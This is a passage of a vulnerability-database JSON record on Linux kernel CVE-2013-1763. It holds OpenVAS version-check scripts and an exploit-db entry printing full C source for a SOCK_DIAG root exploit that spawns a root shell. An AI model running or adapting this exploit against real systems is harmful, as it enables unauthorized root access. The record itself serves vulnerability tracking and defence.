script_name(\"Fedora Update for kernel FEDORA-2013-3086\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.7.9~205.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-22T13:09:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1767", "CVE-2013-0228", "CVE-2013-0190", "CVE-2013-1763", "CVE-2013-0290"], "description": "Check for the Version of kernel", "modified": "2018-01-22T00:00:00", "published": "2013-03-05T00:00:00", "id": "OPENVAS:865401", "href": "http://plugins.openvas.org/nasl.php?oid=865401", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2013-3223", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2013-3223\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"kernel on Fedora 18\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. 
The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/099471.html\");\n script_id(865401);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-05 09:39:06 +0530 (Tue, 05 Mar 2013)\");\n script_cve_id(\"CVE-2013-1767\", \"CVE-2013-1763\", \"CVE-2013-0290\", \"CVE-2013-0228\", \"CVE-2013-0190\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-3223\");\n script_name(\"Fedora Update for kernel FEDORA-2013-3223\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.8.1~201.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", 
"cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:09:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0160", "CVE-2013-1763", "CVE-2013-0231", "CVE-2013-0216", "CVE-2012-5374"], "description": "Check for the Version of kernel", "modified": "2018-01-25T00:00:00", "published": "2013-03-11T00:00:00", "id": "OPENVAS:850425", "href": "http://plugins.openvas.org/nasl.php?oid=850425", "type": "openvas", "title": "SuSE Update for kernel openSUSE-SU-2013:0395-1 (kernel)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_0395_1.nasl 8526 2018-01-25 06:57:37Z teissa $\n#\n# SuSE Update for kernel openSUSE-SU-2013:0395-1 (kernel)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Linux kernel was updated to 3.4.33 and to fix a local\n root privilege escalation and various other security and\n non-security bugs.\n\n CVE-2013-1763: A out of bounds access in sock_diag could be\n used by local attackers to execute code in kernel context\n and so become root.\n\n CVE-2013-0160: The atime of /dev/ptmx is no longer updated,\n avoiding side channel attacks via user typing speed.\n\n CVE-2012-5374: Denial of service via btrfs hashes could\n have been used by local attackers to cause a compute denial\n of service.\n\n CVE-2013-0216: Fixed a problem in XEN netback: shutdown the\n ring if it contains garbage.\n\n CVE-2013-0231: Fixed a problem in XEN pciback: rate limit\n error messages from xen_pcibk_enable_msi(x).\";\n\n\ntag_affected = \"kernel on openSUSE 12.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00004.html\");\n script_id(850425);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-11 18:29:24 +0530 (Mon, 11 Mar 2013)\");\n script_cve_id(\"CVE-2012-5374\", \"CVE-2013-0160\", \"CVE-2013-0216\", \"CVE-2013-0231\",\n \"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2013:0395_1\");\n script_name(\"SuSE Update for 
kernel openSUSE-SU-2013:0395-1 (kernel)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel-debuginfo\", rpm:\"kernel-desktop-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-devel-debuginfo\", rpm:\"kernel-ec2-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-extra\", rpm:\"kernel-ec2-extra~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-extra-debuginfo\", rpm:\"kernel-ec2-extra-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel-debuginfo\", rpm:\"kernel-trace-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel-debuginfo\", rpm:\"kernel-vanilla-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.4.33~2.24.2\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n 
exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2018-05-24T14:08:10", "description": "Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation. CVE-2013-1763. Local exploit for Linux platform", "published": "2015-08-26T00:00:00", "type": "exploitdb", "title": "Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2015-08-26T00:00:00", "id": "EDB-ID:44299", "href": "https://www.exploit-db.com/exploits/44299/", "sourceData": "/** \r\n * based on the exploit by SynQ\r\n *\r\n * Modified PoC for CVE-2013-1763 with SMEP bypass\r\n * Presentation: Practical SMEP Bypass Techniques on Linux\r\n * Vitaly Nikolenko\r\n * vnik@cyseclabs.com\r\n * \r\n * Target: Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux\r\n *\r\n * gcc sockdiag_smep.c -O2 -o pwn \r\n */\r\n\r\n/**\r\n EDB Note: Video ~ https://youtu.be/jHJd-5NvWlQ\r\n**/\r\n\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/inet_diag.h>\r\n#include <sys/mman.h>\r\n#include <assert.h>\r\n//#include <linux/sock_diag.h>\r\n//#include <linux/unix_diag.h>\r\n//#include <linux/netlink.h>\r\n#include \"sock_diag.h\"\r\n#include \"unix_diag.h\"\r\n#include \"netlink.h\"\r\n\r\nunsigned long user_cs;\r\nunsigned long user_ss;\r\nunsigned long user_rflags;\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long 
sock_diag_handlers, nl_table;\r\n\r\nstatic void saveme() {\r\n\tasm(\r\n\t\"movq %%cs, %0\\n\"\r\n\t\"movq %%ss, %1\\n\"\r\n\t\"pushfq\\n\"\r\n\t\"popq %2\\n\"\r\n\t: \"=r\" (user_cs), \"=r\" (user_ss), \"=r\" (user_rflags) : : \"memory\" \t\t);\r\n}\r\n\r\nvoid shell(void) {\r\n\tif(!getuid())\r\n\t\tsystem(\"/bin/sh\");\r\n\r\n\texit(0);\r\n}\r\n\r\nstatic void restore() {\r\n\tasm volatile(\r\n\t\"swapgs ;\"\r\n\t\"movq %0, 0x20(%%rsp)\\t\\n\"\r\n\t\"movq %1, 0x18(%%rsp)\\t\\n\"\r\n\t\"movq %2, 0x10(%%rsp)\\t\\n\"\r\n\t\"movq %3, 0x08(%%rsp)\\t\\n\"\r\n\t\"movq %4, 0x00(%%rsp)\\t\\n\"\r\n\t\"iretq\"\r\n\t: : \"r\" (user_ss),\r\n\t \"r\" ((unsigned long)0x36000000),\r\n\t \"r\" (user_rflags),\r\n\t \"r\" (user_cs),\r\n\t \"r\" (shell)\r\n\t);\r\n}\r\n\r\nint __attribute__((regparm(3)))\r\nkernel_code()\r\n{\r\n\tcommit_creds(prepare_kernel_cred(0));\r\n\trestore();\r\n\t\r\n\treturn -1;\r\n}\r\n\r\nint main(int argc, char*argv[])\r\n{\r\n\tint fd;\r\n\r\n\tstruct sock_diag_handler {\r\n\t\t__u8 family;\r\n\t\tint (*dump)(void *a, void *b);\r\n\t};\r\n\r\n\tunsigned family;\r\n\tstruct {\r\n\t\tstruct nlmsghdr nlh;\r\n\t\tstruct unix_diag_req r;\r\n\t} req;\r\n\r\n\tif ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n\t\tprintf(\"Can't create sock diag socket\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tvoid *mapped;\r\n\tvoid *fakestruct;\r\n\tstruct sock_diag_handler a;\r\n\ta.dump = (void *)0xffffffff8100b74f;\r\n\r\n\tcommit_creds = (_commit_creds) 0xffffffff8107ee30;\r\n\tprepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107f0c0;\r\n\r\n\tassert((fakestruct = mmap((void *)0x10000, 0x10000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE, 0, 0)) == (void*)0x10000);\r\n\tmemcpy(fakestruct+0xad38, &a, sizeof(a));\r\n\r\n\tassert((mapped = mmap((void*)0x35000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, 0, 0)) == (void*)0x35000000);\r\n\r\n\tunsigned long *fakestack = (unsigned long 
*)mapped;\r\n\t*fakestack ++= 0xffffffff01661ef4;\r\n\tint p;\r\n\tfor (p = 0; p < 0x1000000; p++)\r\n\t\t*fakestack ++= 0xffffffff8100ad9eUL;\r\n\t\r\n\tfakestack = (unsigned long *)(mapped + 0x7000000);\r\n\tprintf(\"[+] fake stack addr = %lx\\n\", (long unsigned)fakestack);\r\n\t*fakestack ++= 0xffffffff8133dc8fUL;\r\n\t*fakestack ++= 0x407e0;\r\n\t*fakestack ++= 0xffffffff810032edUL;\r\n\t*fakestack ++= 0xdeadbeef;\r\n\t*fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode\r\n\r\n\tmemset(&req, 0, sizeof(req));\r\n\treq.nlh.nlmsg_len = sizeof(req);\r\n\treq.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\r\n\treq.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n\treq.nlh.nlmsg_seq = 123456;\r\n\r\n\treq.r.sdiag_family = 45;\r\n\r\n\treq.r.udiag_states = -1;\r\n\treq.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n\r\n\tsaveme();\r\n\tif ( send(fd, &req, sizeof(req), 0) < 0) {\r\n\t\tprintf(\"bad send\\n\");\r\n\t\tclose(fd);\r\n\t\treturn -1;\r\n\t}\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44299/"}, {"lastseen": "2016-02-03T18:58:07", "description": "Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit. CVE-2013-1763. 
